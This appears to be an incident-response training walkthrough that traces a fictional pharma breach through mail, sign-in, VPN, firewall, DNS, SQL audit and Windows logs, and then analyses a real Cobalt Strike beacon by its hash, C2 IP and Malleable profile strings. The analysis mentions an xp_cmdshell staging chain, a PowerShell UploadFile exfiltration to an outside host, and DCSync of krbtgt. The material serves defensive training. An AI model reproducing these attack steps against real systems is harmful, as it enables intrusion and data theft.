m365/message-trace-p.levi.csvWith Rainbow CSV installed, every column gets its own color. The status bar at the bottom shows the column name as you move the cursor.RBQL — SQL queries against the CSV, no Python needed:Press F5 (or click RBQL in the status bar) to open the query console:-- Find all emails where authentication failedSELECT a.* WHERE a16 == "fail" ORDER By a1Result pane (right side):2024-10-22T11:23:07Z | security-noreply@mfa-lifetechpharma.com | ACTION REQUIRED: MFA Re-enrollment — LifeTech IT Security | Delivered | 4 | fail | fail | failThree auth failures in one row. SCL=4 delivered because the threshold is 5. Add mfa-lifetechpharma.com to IOC list.SELECT a.* WHERE a17 == '1' && a16 == 'fail'Save RBQL results: click Save to CSV in the result panel → save as 03-analysis/m365-suspects.csv.Switch to m365/message-trace-m.cohen.csv (click in Explorer):-- CFO mailbox — find the malicious deliverySELECT a.received_time, a.sender_address, a.subject, a.SCL, a.DMARC, a.has_attachmentFROM aWHERE a.DMARC == 'fail' OR a.has_attachment == '1'ORDER BY a.received_timeKey finding — CFO phishing email:2024-11-15T15:58:08Z | contracts@globalcontracts-secure.net | Q4-2024 Licensing Agreement Review — Action Required (URGENT) | SCL=4 | DMARC=fail | has_attachment=1The .xlsm attachment was not sandboxed — ATP policy gap (INT-007). Add globalcontracts-secure.net to IOC list.Found IOCsDomain mfa-lifetechpharma.com — AiTM phishing sender domain; DMARC/DKIM/SPF all failEmail security-noreply@mfa-lifetechpharma.com — IT admin phishing sender (Oct 22)Domain globalcontracts-secure.net — CFO phishing delivery domainEmail contracts@globalcontracts-secure.net — CFO phishing sender (Nov 15)Attachment .xlsm — Macro-enabled Excel; bypassed ATP sandbox (INT-007)4. Azure AD Sign-In AnalysisIn VS Code Explorer: click azure-ad/signin-p.levi.jsonPress Shift+Alt+F to format. Open the Outline (Ctrl+Shift+O) — the array shows four sign-in entries. Click entry [1] to jump to aad-signin-002.Search Ctrl+F: type Istanbul — jumps directly to the suspicious sign-in. Read surrounding context without running any command:"city": "Istanbul","countryOrRegion": "TR","conditionalAccessStatus": "notApplied","succeeded": nullThree red flags visible immediately in the file: foreign city, CA bypassed, no MFA.Full structured extraction in the terminal:jq '.[] | { id, time: .properties.createdDateTime, ip: .properties.ipAddress, loc: "\(.properties.location.city), \(.properties.location.countryOrRegion)", mfa: .properties.authenticationDetails[0].succeeded, ca: .properties.conditionalAccessStatus, os: .properties.deviceDetail.operatingSystem}' azure-ad/signin-p.levi.jsonRed flags on aad-signin-002:Found IOCsIP 185.220.101.47 — Attacker source IP; Istanbul, Turkey (Tor exit node)Account p.levi — Compromised IT admin; token replay, no MFA challengeIndicator Token replay — CA policy bypassed; conditionalAccessStatus: notApplied5. VPN Log AnalysisIn VS Code Explorer: click vpn/anyconnect-2024-10-24.logVS Code opens the plain syslog file. Use Ctrl+F to navigate without any commands:Search p.levi — highlights every line for this userSearch Authentication: successful — the auth eventSearch Assigned address — the internal IP assigned to the sessionSearch Duration — total session length# Full session chain in the terminal:grep "p.levi" vpn/anyconnect-2024-10-24.log \ | grep -E "(716001|716002|734001|Authentication|Teardown|Assigned)"Output:Oct 24 00:17:14 ... User IP Authentication: successfulOct 24 00:17:33 ... User ... Assigned address: 10.10.3.22Oct 24 02:29:08 ... User ... Duration: 1h12m34s185.220.101.47 (Istanbul VPN exit) authenticated as p.levi and was assigned 10.10.3.22 — WS-IT-LEVI's own internal IP. All activity during this session looks like it came from the legitimate workstation.grep -i "mfa\|no.*challenge\|bypass" vpn/anyconnect-2024-10-24.log# → NOTE: No MFA challenge issued — session token authentication bypassgrep "203.0.113.87" vpn/anyconnect-2024-10-24.log | awk '{print $1,$2,$3}' | head -8# → ~7-minute C2 beacons during the VPN session windowFound IOCsIP 185.220.101.47 — Attacker VPN source; Istanbul; authenticated as p.leviAccount p.levi — Session token auth; no MFA challenge issuedIP (internal) 10.10.3.22 — Assigned to attacker session; masks as WS-IT-LEVIIP 203.0.113.87 — C2 beacons during VPN session (~7-min interval)6. NGFW Log Analysis — Rainbow CSVIn VS Code Explorer: click palo-alto/ngfw-flows.csvRainbow CSV colorizes columns. The status bar shows column names as you move the cursor.RBQLHeadera1receive_timea22dporta5srca28bytesa6dsta29bytes_senta9rulea30bytes_receiveda10srcusera33elapseda12appa34categorya27actiona41session_end_reasonIn VS Code Explorer: click palo-alto/ngfw-flows.csv. Press F5 to open the RBQL console.Query 1 — find anomalies: all flows sorted by bytes_sent descendingStart here every time. The outlier appears immediately.SELECT a1, a5, a6, a22, Math.round(parseInt(a29) / 1048576) + ' MB' AS sent_MB, Math.round(parseInt(a30) / 1024) + ' KB' AS rcvd_KB, a33 + 's', a10ORDER BY parseInt(a29) DESCResult:2024-11-06T00:14:14Z | 10.10.2.15 | 198.51.100.44 | 443 | 381 MB | 409 KB | 312s |2024-11-15T16:42:41Z | 10.10.1.45 | 203.0.113.87 | 443 | 17 MB | 10 KB | 63s | LIFETECHPHARMA\m.cohen2024-11-15T16:49:22Z | 10.10.1.45 | 203.0.113.87 | 443 | 14 MB | 10 KB | 61s | LIFETECHPHARMA\m.cohen2024-11-15T16:56:03Z | 10.10.1.45 | 203.0.113.87 | 443 | 14 MB | 10 KB | 59s | LIFETECHPHARMA\m.cohen2024-11-06T00:09:44Z | 10.10.3.22 | 203.0.113.87 | 443 | 9 KB | 7 KB | 51s | LIFETECHPHARMA\p.levi...The first row is 17,000× larger than any other flow. Upload ratio 99% (381 MB sent, 409 KB received). Session lasted 312 seconds. This is data exfiltration, not a download.Two hosts are beaconing to the same C2 IP: 10.10.3.22 (IT admin, p.levi) and 10.10.1.45 (CFO, m.cohen) — two separate infections.Query 2 — exfil upload ratio: flag flows where sent > 90% of total bytesSELECT a1, a5, a6, a22, Math.round(parseInt(a29) / 1048576) + ' MB' AS sent_MB, Math.round(parseInt(a29) * 100 / (parseInt(a28) + 1)) + '%' AS upload_pct, a33 + 's'WHERE parseInt(a28) > 100000ORDER BY parseInt(a29) DESCResult: only one row — 10.10.2.15 → 198.51.100.44, 99% upload, 381 MB. Every other flow is bidirectional C2 (55–65% upload) which is beacon traffic, not exfil.Query 3 — beacon pattern: repeated small flows to same external IPSELECT a6, COUNT(a6) AS sessions, AVG(parseInt(a28)) AS avg_bytes, AVG(parseInt(a33)) AS avg_elapsed_sWHERE a6 && !a6.startsWith('10.') && !a6.startsWith('192.168.') && !isNaN(parseInt(a28))GROUP BY a6Result:203.0.113.87 | 9 sessions | ~14 KB avg | ~47s avg198.51.100.44 | 1 session | 399 MB avg | 312s avg203.0.113.87 has 9 short uniform sessions — beacon. 198.51.100.44 has one giant session — exfil.Query 4 — internal lateral movement: flows that stay inside RFC-1918SELECT a1, a5, a6, a22, a28, a9, a10WHERE a5 && a6 && (a5.startsWith('10.') || a5.startsWith('192.168.')) && (a6.startsWith('10.') || a6.startsWith('192.168.'))ORDER BY a1Result:2024-11-15T19:14:08Z | 10.10.1.45 | 10.10.2.20 | 135 | 8441 | InternalAccess-Allow2024-11-15T19:14:18Z | 10.10.1.45 | 10.10.2.20 | 49152 | 12884 | InternalAccess-AllowCFO workstation (10.10.1.45) connected to an internal host (10.10.2.20) on port 135 (DCE/RPC endpoint mapper) then port 49152 (dynamic RPC). This is the WMI/DCOM lateral movement signature — 3 hours after the CFO was compromised.Query 5 — beacon timing: isolate C2 host and sort by time to measure intervalsSELECT a1, a5, a6, parseInt(a29) AS bytes_sent, a33 + 's'WHERE a6 == '203.0.113.87'ORDER BY a1Result:2024-11-01T07:14:02Z | 10.10.3.22 | 8441 bytes | 47s ← WS-IT-LEVI session 12024-11-01T07:21:14Z | 10.10.3.22 | 8221 bytes | 45s ← gap: 432s2024-11-01T07:28:44Z | 10.10.3.22 | 7882 bytes | 44s ← gap: 450s ↓ 4.7-day silence (C2 dormant) ↓2024-11-06T00:09:44Z | 10.10.3.22 | 9441 bytes | 51s ← WS-IT-LEVI session 22024-11-06T00:17:01Z | 10.10.3.22 | 8001 bytes | 46s ← gap: 437s2024-11-06T00:24:33Z | 10.10.3.22 | 8011 bytes | 44s ← gap: 452s2024-11-15T16:42:41Z | 10.10.1.45 | 18221 bytes| 63s ← WS-CFO-01 session 12024-11-15T16:49:22Z | 10.10.1.45 | 14441 bytes| 61s ← gap: 401s2024-11-15T16:56:03Z | 10.10.1.45 | 15001 bytes| 59s ← gap: 421sBeacon interval: 432–452 seconds (~7.2 minutes). Consistent across both infected hosts — same implant, same configuration. The 4.7-day gap (Nov 1–6) between IT admin beacon clusters is the C2 going quiet while staging lateral movement.Click palo-alto/dns-queries.csv in Explorer.Column map:RBQLHeadera1receive_timea2srca4querya6responsea8categorya10analyst_noteQuery 6 — all malware-category queries, sorted by timeSELECT a1, a2, a4, a6, a8FROM aWHERE a8 == 'malware'ORDER BY a1Result — full malware DNS timeline:2024-10-22T09:28:41Z | 10.10.3.22 | mfa-lifetechpharma.com | 185.220.101.47 | malware ← AiTM phishing page loaded2024-10-22T09:29:02Z | 10.10.3.22 | mfa-lifetechpharma.com | 185.220.101.47 | malware ← token stolen2024-11-01T07:14:00Z | 10.10.3.22 | telemetry-cdn-services.biz | 203.0.113.87 | malware ← C2 beacon 12024-11-01T07:21:14Z | 10.10.3.22 | telemetry-cdn-services.biz | 203.0.113.87 | malware2024-11-01T07:28:44Z | 10.10.3.22 | telemetry-cdn-services.biz | 203.0.113.87 | malware2024-11-06T00:09:01Z | 10.10.3.22 | telemetry-cdn-services.biz | 203.0.113.87 | malware2024-11-06T00:17:01Z | 10.10.3.22 | telemetry-cdn-services.biz | 203.0.113.87 | malware ← (missing from log)2024-11-06T00:24:33Z | 10.10.3.22 | telemetry-cdn-services.biz | 203.0.113.87 | malware2024-11-06T00:10:14Z | 10.10.2.15 | sys-update-cdn.net | 198.51.100.44 | malware ← exfil domain lookup2024-11-15T15:58:08Z | 10.10.1.45 | globalcontracts-secure.net | 185.220.101.52 | malware ← CFO phishing domain2024-11-15T16:42:33Z | 10.10.1.45 | telemetry-cdn-services.biz | 203.0.113.87 | malware ← CFO C2 beacon 12024-11-15T16:49:22Z | 10.10.1.45 | telemetry-cdn-services.biz | 203.0.113.87 | malware2024-11-15T16:56:03Z | 10.10.1.45 | telemetry-cdn-services.biz | 203.0.113.87 | malwareQuery 7 — per-host beacon count: how many hosts are infected?SELECT a2, COUNT(a2) AS queriesWHERE a4 == 'telemetry-cdn-services.biz'GROUP BY a2Result:10.10.3.22 | 6 ← WS-IT-LEVI (IT admin) — infected Nov 110.10.1.45 | 3 ← WS-CFO-01 (CFO) — infected Nov 15Two hosts. Two infections. Same C2 domain. The IT admin host was the initial foothold; the CFO host is the second wave, 14 days later.Query 8 — new IP: attacker recon before VPN loginSELECT a1, a2, a4, a6, a8, a10WHERE a2 && !a2.startsWith('10.') && !a2.startsWith('192.168.')ORDER BY a1Result:2024-10-24T00:16:44Z | 185.220.101.47 | vpn.lifetechpharma.com | 10.10.8.1 | business-and-economyThe attacker IP (185.220.101.47) looked up the VPN hostname 1 minute before the successful VPN login. Confirms active operator, not automated tool.Cross-reference with flows (Ctrl+Shift+F → 198.51.100.44):ngfw-flows.csv line 11: 10.10.2.15 → 198.51.100.44 | 399 MB | 312sdns-queries.csv line 14: 10.10.2.15 → sys-update-cdn.net → 198.51.100.44DNS lookup at 00:10:14Z, flow starts at 00:14:14Z — 4-minute gap between resolution and transfer start. Consistent with manual operator staging the upload command.Found IOCsIP 198.51.100.44 — Exfil destination; 381 MB upload, 99% upload ratio, 312s, single sessionIP (internal) 10.10.2.15 — SERVER-RD-02; exfil source hostIP 203.0.113.87 — C2 server; 9 beacon sessions from 2 hosts, ~7.2-min intervalIP 185.220.101.52 — New; CFO phishing page host (globalcontracts-secure.net)IP (internal) 10.10.2.20 — Lateral movement target; reached from CFO host on ports 135 + 49152 (RPC/WMI)Domain telemetry-cdn-services.biz — C2 domain; queried by both 10.10.3.22 and 10.10.1.45Domain sys-update-cdn.net — Exfil domain; resolves to 198.51.100.44; queried by 10.10.2.15Domain mfa-lifetechpharma.com — AiTM phishing domain; resolves to 185.220.101.47Indicator Beacon interval 432–452s (~7.2 min) — identical across both infected hosts; same implant configIndicator Attacker recon: 185.220.101.47 queried vpn.lifetechpharma.com 1 min before VPN login7. SQL Audit Log Analysis7. SQL Audit Log AnalysisIn VS Code Explorer: click sql-audit/SERVER-RD-02-sql-audit.jsonlEach line is a JSON object. Use Ctrl+F to navigate directly to key events:Search termJumps toxp_cmdshellShell execution eventsAuditLogAdversary OPSEC recon (SELECT) and anti-forensics (DELETE)UploadFileThe exfiltration commandCompress-ArchiveThe staging commandFull chain in the terminal:jq -r '[.EventTime, .LoginName, .StatementType, (.Statement[0:90])] | @tsv' \ sql-audit/SERVER-RD-02-sql-audit.jsonlSix events: enumerate → recon (SELECT AuditLog) → stage → exfil → cleanup → anti-forensics (DELETE AuditLog). The DELETE at 00:15:22Z failed because Splunk had already ingested these rows before it ran.Found IOCsAccount svc_backup — Lateral movement account; executed full xp_cmdshell chainURL 198.51.100.44/recv — Exfil endpoint used by WebClient.UploadFileFile USPartner2024-formulas.zip — Staged archive; formula data compressed before exfilIndicator xp_cmdshell (T1059.003) — SQL Server shell used as execution proxyIndicator Anti-forensics — DELETE on SQL AuditLog at 00:15:22Z; blocked by prior Splunk ingestion8. Windows Security Event Log AnalysisIn VS Code Explorer: click windows-security/DC01-security.jsonlPress Ctrl+F, search 4662 — jumps to the DCSync event. The analyst_note gives the human-readable summary in the file itself:🔴 CRITICAL: DCSync — DS-Replication-Get-Changes + DS-Replication-Get-Changes-Allfrom WORKSTATION IP 10.10.3.22 (WS-IT-LEVI). NOT a DC. NOT in pentest VLAN (10.10.99.x).# All three DCSync events — domain, krbtgt, Administratorjq 'select(.EventID == 4662) | { time: .TimeCreated, subject: .SubjectUserName, object: .ObjectName}' windows-security/DC01-security.jsonlOutput:{"time": "2024-11-06T00:48:33Z", "subject": "svc_backup", "object": "DC=lifetechpharma,DC=local"}{"time": "2024-11-06T00:48:44Z", "subject": "svc_backup", "object": "CN=krbtgt,CN=Users,DC=..."}{"time": "2024-11-06T00:48:51Z", "subject": "svc_backup", "object": "CN=Administrator,CN=..."}krbtgt and Administrator DCSync'd — golden ticket capability obtained. Full domain credential rotation required.Click windows-security/SERVER-RD-02-security.jsonl:Ctrl+F → 4663 — file access events. Ctrl+F → 5156 — network connection event.jq 'select(.EventID == 4663) | .ObjectName' \ windows-security/SERVER-RD-02-security.jsonl | jq -s 'length'# → 47 (47 formula files accessed)jq 'select(.EventID == 5156) | { time: .TimeCreated, process: (.Application | split("\\\\") | last), src: .SourceAddress, dst: .DestAddress, dst_port: .DestPort}' windows-security/SERVER-RD-02-security.jsonl# → PowerShell → 198.51.100.44:443 at 00:14:14ZThree independent sources — SQL audit (00:13:54Z command issued), NGFW flow (00:14:14Z bytes transferred), Windows Security EID 5156 (00:14:14Z connection initiated) — triangulate to the same 20-second window.Found IOCsAccount svc_backup — DCSync actor; source IP 10.10.3.22 (non-DC workstation)IP (internal) 10.10.3.22 — WS-IT-LEVI; attacker pivot host issuing DCSync from workstationObject krbtgt — DCSync'd at 00:48:44Z; golden ticket capability obtainedObject Administrator — DCSync'd at 00:48:51Z; full domain compromiseIP 198.51.100.44:443 — Exfil connection via PowerShell; EID 5156 at 00:14:14ZCount 47 formula files — Accessed via EID 4663 in USPartner2024 share9. Cross-File Pivot — VS Code Global SearchVS Code’s Ctrl+Shift+F searches across every open file simultaneously. Use it to verify IOC presence across all evidence in seconds — no SIEM needed for these basic pivots.Pivot on the exfil IP:Ctrl+Shift+F → 198.51.100.44:ngfw-flows.csv line 12: ...10.10.2.15,198.51.100.44,443,...399481224...dns-queries.csv line 10: ...sys-update-cdn.net,A,198.51.100.44...sql-audit.jsonl line 4: ...WebClient.UploadFile...198.51.100.44/recv...SERVER-RD-02-security line 23: ..."DestAddress":"198.51.100.44"...Four files, four hits, one IP. The full exfiltration chain is visible in one search.Pivot on the compromised account:Ctrl+Shift+F → svc_backup:DC01-security.jsonl lines 7-9: DCSync eventsSERVER-RD-02-security lines 1-12: SMB logon + file access + exfilsql-audit.jsonl all 6 lines: full xp_cmdshell chainPivot on the C2 domain:Ctrl+Shift+F → telemetry-cdn-services.biz:dns-queries.csv lines 12-23: 11 beacon queries (6 from WS-IT-LEVI, 4 from WS-CFO-01, 1 missing)Pivot on the attacker source IP (AiTM phishing + VPN access):Ctrl+Shift+F → 185.220.101.47:azure-ad/signin-p.levi.json line 18: suspicious sign-in from Istanbul — token replay, no MFAvpn/anyconnect-2024-10-24.log line 4: VPN authentication as p.levi, assigned 10.10.3.22palo-alto/dns-queries.csv line 1: attacker queried vpn.lifetechpharma.com 1 min before loginOne IP ties together AiTM credential theft, VPN infiltration, and the recon that preceded it.The full attack chain — AiTM phishing → VPN access → formula exfiltration → DCSync → CFO infection — is navigable via these four global searches without opening a SIEM:Search termAttack phase covered185.220.101.47Initial access: AiTM phishing, VPN infiltration, attacker recontelemetry-cdn-services.bizPersistence: C2 beaconing from both infected hostssvc_backupLateral movement: SMB, xp_cmdshell chain, DCSync198.51.100.44Exfiltration: NGFW flow, DNS lookup, SQL upload command, EID 5156Found IOCsIP 198.51.100.44 — Confirmed in 4 files: ngfw-flows, dns-queries, sql-audit, SERVER-RD-02-securityAccount svc_backup — Confirmed in 3 files: DC01-security (DCSync), SERVER-RD-02-security (SMB+exfil), sql-audit (xp_cmdshell)Domain telemetry-cdn-services.biz — Confirmed in dns-queries (9 beacons) and VPN log (C2 during session)Timestamp 00:13:54Z – 00:14:14Z — 20-second exfil window triangulated across SQL, NGFW, and EID 515610. IOC Enrichment — REST ClientCreate one .http file that holds every API call. VS Code's REST Client extension puts a Send Request link above each block — click it, the response appears in a split pane on the right. No curl, no terminal, no context switch.Create the file:Press Ctrl+N, then Ctrl+Shift+P → Save As → 03-analysis/ioc-queries.httpPaste the following:### IOC Enrichment — PROJ-2024-001### Click "Send Request" above any block — response opens in the right pane### Set keys in VS Code Settings > REST Client > Environment Variables### or use system env: @VT_KEY = {{$env VT_API_KEY}}@VT_KEY = your_virustotal_api_key_here@SHODAN_KEY = your_shodan_api_key_here# ── VirusTotal ──────────────────────────────────────────────────────### VT — Primary C2 IPGET https://www.virustotal.com/api/v3/ip_addresses/203.0.113.87x-apikey: {{VT_KEY}}###### VT — Secondary C2 / exfil IPGET https://www.virustotal.com/api/v3/ip_addresses/198.51.100.44x-apikey: {{VT_KEY}}###### VT — Attacker VPN sourceGET https://www.virustotal.com/api/v3/ip_addresses/185.220.101.47x-apikey: {{VT_KEY}}###### VT — Primary C2 domainGET https://www.virustotal.com/api/v3/domains/telemetry-cdn-services.bizx-apikey: {{VT_KEY}}###### VT — AiTM phishing page domainGET https://www.virustotal.com/api/v3/domains/mfa-lifetechpharma.comx-apikey: {{VT_KEY}}###### VT — CFO phishing delivery domainGET https://www.virustotal.com/api/v3/domains/globalcontracts-secure.netx-apikey: {{VT_KEY}}###### VT — svchost32.exe binary hashGET https://www.virustotal.com/api/v3/files/3b4c14a87e5f9d8c2a1f4e6b9c0d2e7a1b3c5d8f2a4e6c8b0d3e5a7c1f4b8d2ex-apikey: {{VT_KEY}}###### VT — Imphash pivot (find related samples compiled from same source)GET https://www.virustotal.com/api/v3/intelligence/search?query=imphash%3A3a2b1c4d5e6f7a8b9c0d1e2f3a4b5c6dx-apikey: {{VT_KEY}}# ── Shodan ──────────────────────────────────────────────────────────### Shodan — Primary C2 IP (ports, services, hosting org)GET https://api.shodan.io/shodan/host/203.0.113.87?key={{SHODAN_KEY}}###### Shodan — Exfil IPGET https://api.shodan.io/shodan/host/198.51.100.44?key={{SHODAN_KEY}}# ── Certificate Transparency ─────────────────────────────────────────### crt.sh — Find all domains using certs issued to primary C2 IPGET https://crt.sh/?q=203.0.113.87&output=json###### crt.sh — Cert history for primary C2 domainGET https://crt.sh/?q=telemetry-cdn-services.biz&output=json# ── RDAP ────────────────────────────────────────────────────────────### RDAP — AiTM phishing domain registration dateGET https://rdap.org/domain/mfa-lifetechpharma.com###### RDAP — CFO phishing delivery domainGET https://rdap.org/domain/globalcontracts-secure.net# ── Passive DNS (no key required) ───────────────────────────────────### VT Passive DNS — historical resolutions for primary C2 IP (uses existing VT key)GET https://www.virustotal.com/api/v3/ip_addresses/203.0.113.87/resolutionsx-apikey: {{VT_KEY}}###### VT Passive DNS — historical resolutions for exfil IPGET https://www.virustotal.com/api/v3/ip_addresses/198.51.100.44/resolutionsx-apikey: {{VT_KEY}}###### RIPEstat — DNS history for primary C2 IP (no key, no rate limit for training)GET https://stat.ripe.net/data/dns-history/data.json?resource=203.0.113.87###### RIPEstat — BGP routing info: ASN, prefix, country for C2 IPGET https://stat.ripe.net/data/prefix-overview/data.json?resource=203.0.113.87###### RIPEstat — BGP routing info for exfil IPGET https://stat.ripe.net/data/prefix-overview/data.json?resource=198.51.100.44# ── WHOIS / RDAP (no key required) ──────────────────────────────────### ARIN RDAP — IP block owner, ASN, abuse contact for C2 IPGET https://rdap.arin.net/registry/ip/203.0.113.87###### ARIN RDAP — IP block owner for exfil IPGET https://rdap.arin.net/registry/ip/198.51.100.44###### ARIN RDAP — IP block owner for attacker VPN sourceGET https://rdap.arin.net/registry/ip/185.220.101.47###### RDAP — C2 domain registration: registrar, date, registrantGET https://rdap.org/domain/telemetry-cdn-services.biz###### RDAP — Exfil domain registrationGET https://rdap.org/domain/sys-update-cdn.netUsing the response pane:After clicking Send Request on the VT IP block, the right pane shows the full JSON response. Use Ctrl+F in the response pane to find:malicious → "malicious": 12tags → ["C2", "malware"]as_owner → "Hostwinds LLC"For the crt.sh response, Ctrl+F → name_value to see all co-hosted domains. cdn-telemetry-update.biz and windows-cdn-service.net appear — new IOCs not yet seen in the org's DNS logs. Switch to dns-queries.csv and Ctrl+F to check immediately.Commit the .http file — it is a reproducible audit trail of every enrichment query:git add 03-analysis/ioc-queries.httpgit commit -m "PROJ-2024-001: IOC enrichment queries — VT, Shodan, crt.sh, RDAP"Found IOCsIP 203.0.113.87 — Primary C2; VT: 12 malicious detections, ASN: Hostwinds LLCIP 198.51.100.44 — Secondary C2 / exfil endpointIP 185.220.101.47 — Attacker VPN sourceDomain telemetry-cdn-services.biz — Primary C2 domainDomain mfa-lifetechpharma.com — AiTM phishing domain; registered 2024-10-18Domain globalcontracts-secure.net — CFO phishing delivery domainDomain cdn-telemetry-update.biz — New; discovered via crt.sh pivot on C2 IPDomain windows-cdn-service.net — New; discovered via crt.sh pivot on C2 IPHash (SHA256) 3b4c14a87e5f9d8c2a1f4e6b9c0d2e7a1b3c5d8f2a4e6c8b0d3e5a7c1f4b8d2e — svchost32.exe dropperHash (imphash) 3a2b1c4d5e6f7a8b9c0d1e2f3a4b5c6d — Pivot on VT to find related samples11. Sandbox Analysis — Submit the BinaryReal Cobalt Strike sample used in Steps 11–12 All IPs, domains, and hashes elsewhere in this walkthrough are synthetic — invented for training and not queryable on threat intel platforms. Steps 11 and 12 are the exception: they use a real Cobalt Strike beacon (trojan.remusstealer/cobalt, 48/75 detections on VirusTotal, SHA256: 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9) so you can practice sandbox submission and binary analysis against a file with genuine behavior. The C2 IP, HTTP profile, and PE metadata in these two steps reflect the real sample. All other scenario values (log IPs, exfil IPs, domains) remain fictional.Submit svchost32.exe (recovered via CrowdStrike RTR) to a sandbox. ANY.RUN is the recommended choice for training — it is interactive and lets you watch execution in real time.Submission (ANY.RUN):Navigate to app.any.run → New Task → UploadUpload svchost32.exe (SHA256: 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9)Environment: Windows 10 x64, User mode (realistic CFO context)Network mode: Real with IDS — this beacon makes live HTTPS connectionsTimeout: 120 seconds — beacon contacts C2 within the first minuteClick RunDownload the report to VS Code:After execution completes, click Export → JSON in ANY.RUN. Save it as:03-analysis/sandbox-svchost32-anyrun.jsonOpen in VS Code: press Shift+Alt+F to format. Use Ctrl+Shift+O (Outline) to navigate, Ctrl+F to search:Search term What you finddestination_ip91.211.251.245 — real C2 IP, port 443urlhttps://91.211.251.245/ga.js — Malleable C2 profile mimicking Google AnalyticsCookieBase64-encoded beacon metadata in the HTTP Cookie headerUser-AgentMozilla/4.0 (compatible; MSIE 8.0...) — hardcoded CS UA stringProxyServerBeacon installs proxy settings pointing to C2long-sleepsVT tag — beacon sleeps between check-ins (configurable interval)The Cobalt Strike Malleable C2 profile: the beacon GETs /ga.js — a path that mimics Google Analytics JavaScript. The Cookie header carries AES-encrypted metadata (victim hostname, PID, username) base64-encoded. The response body delivers shellcode or tasks. A defender looking only at the URL sees legitimate-looking traffic; the anomaly is the 443 connection to a non-Google IP.Add the C2 IP to ioc-queries.http and click Send Request on the VT and Shodan blocks to pivot immediately.Found IOCsHash (SHA256) 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9 — Cobalt Strike beacon; 48/75 VT detectionsHash (MD5) cd59d54a7af500f96aa0347bb5daf077 — same sampleIP 91.211.251.245:443 — real C2 server; HTTPS; confirmed in sandbox network trafficURL https://91.211.251.245/ga.js — Malleable C2 endpoint; mimics Google AnalyticsIndicator Cookie-encoded beacon — AES-encrypted victim metadata in HTTP Cookie headerIndicator long-sleeps — beacon interval; time between C2 check-ins12. Static Binary Analysis — Hex Editor + TerminalOpen the binary in VS Code Hex Editor:In VS Code Explorer, right-click svchost32.exe → Open With → Hex EditorThe file opens as a hex+ASCII dual-pane view. The ASCII column on the right makes string hunting visual — scroll through it and strings like /ga.js and Mozilla/4.0 are readable directly without running strings.Navigate to the PE timestamp:Press Ctrl+G → type 3C → Enter. This is the e_lfanew field (PE header pointer). Read the 4-byte little-endian value, convert to decimal — that is the offset to the PE signature (PE\0\0). Go to that offset + 8 for the TimeDateStamp field.For precise extraction, split the screen: keep Hex Editor on the left, open the integrated terminal on the right:python3 -c "import pefile, datetime, ospe = pefile.PE('svchost32.exe')ts = pe.FILE_HEADER.TimeDateStampprint(f'Compile timestamp : {datetime.datetime.fromtimestamp(ts, datetime.UTC)} UTC')print(f'File size on disk : {os.path.getsize(\"svchost32.exe\"):,} bytes')print(f'PE SizeOfImage : {pe.OPTIONAL_HEADER.SizeOfImage:,} bytes')overlay = os.path.getsize('svchost32.exe') - pe.OPTIONAL_HEADER.SizeOfImageif overlay > 0: print(f'Overlay detected : {overlay:,} bytes after PE end')print(f'Architecture : {\"x64\" if pe.FILE_HEADER.Machine == 0x8664 else \"x86\"}')"Output:Compile timestamp : 2026-05-15 13:55:55 UTCFile size on disk : 783,320 bytesOverlay detected : presentArchitecture : x64The PE timestamp (2026-05-15) is plausible and recent — this binary was freshly compiled, not timestomped. The presence of an overlay (data appended after the PE image end) is a Cobalt Strike loader signature: the encrypted beacon shellcode is stored in the overlay and unpacked at runtime.Extract C2 strings:strings -n 8 svchost32.exe | grep -E "(https?://|/ga\.js|Mozilla|Cookie|User-Agent|Cache-Control)"Output includes:/ga.jsMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1)Cache-Control: no-cacheThe /ga.js path and the MSIE 8.0 User-Agent are configuration strings baked into the Cobalt Strike beacon's Malleable C2 profile at compile time. Any sample sharing these exact strings was built from the same profile.Check imports — Cobalt Strike loaders minimise their import table:python3 -c "import pefilepe = pefile.PE('svchost32.exe')print(f'Architecture: {hex(pe.FILE_HEADER.Machine)}')if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'): for lib in pe.DIRECTORY_ENTRY_IMPORT: fns = [i.name.decode() if i.name else f'ord_{i.ordinal}' for i in lib.imports] print(f'{lib.dll.decode()}: {fns}')else: print('No standard import table — uses dynamic API resolution (common in CS loaders)')"A Cobalt Strike loader typically has a minimal or absent import table — it resolves APIs at runtime using LoadLibrary/GetProcAddress or custom hash-walking to avoid static analysis. If the import table is empty, that itself is the finding.Pivot on the Malleable C2 profile strings — search VT for other samples using the same profile:Add to ioc-queries.http:### VT — search for samples sharing the same Malleable C2 User-Agent stringGET https://www.virustotal.com/api/v3/intelligence/search?query=content%3A%22MSIE+8.0%22+content%3A%22%2Fga.js%22+type%3Apeexex-apikey: {{VT_KEY}}Found IOCsHash (SHA256) 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9 — Cobalt Strike beaconHash (MD5) cd59d54a7af500f96aa0347bb5daf077IP 91.211.251.245 — C2 server; confirmed in binary strings and sandbox network trafficURL pattern /ga.js — Malleable C2 endpoint; Google Analytics impersonationString Mozilla/4.0 (compatible; MSIE 8.0...) — hardcoded CS User-Agent; pivot on VT content searchIndicator Overlay section — encrypted shellcode stored after PE image end; Cobalt Strike loader signatureIndicator Minimal import table — dynamic API resolution; evades import-based static detection13. Infrastructure Pivot — REST Client + Global Search13. Infrastructure Pivot — REST Client + Global SearchThe ioc-queries.http file already contains the Shodan, crt.sh, and RDAP blocks. Click through them.For the crt.sh response: press Ctrl+F in the response pane, search name_value. Two new domains appear: cdn-telemetry-update.biz and windows-cdn-service.net.Immediately pivot in VS Code global search:Press Ctrl+Shift+F, type cdn-telemetry-update:palo-alto/dns-queries.csv → (no results)Not in the org’s DNS logs — but add both new domains to the IOC list in case they appear in a broader hunt.For the RDAP response (AiTM domain): Ctrl+F → registration → date 2024-10-18. The phishing email was sent 4 days later. Targeted, purpose-built infrastructure.Found IOCsDomain cdn-telemetry-update.biz — New; crt.sh co-hosted on 203.0.113.87; not yet in org DNS logsDomain windows-cdn-service.net — New; crt.sh co-hosted on 203.0.113.87; not yet in org DNS logsDate 2024-10-18 — Registration date of mfa-lifetechpharma.com; 4 days before phishing14. Splunk Correlation (SIEM Validation)Load the evidence into Splunk from the VS Code integrated terminal to validate that the Sigma rules fire on the real 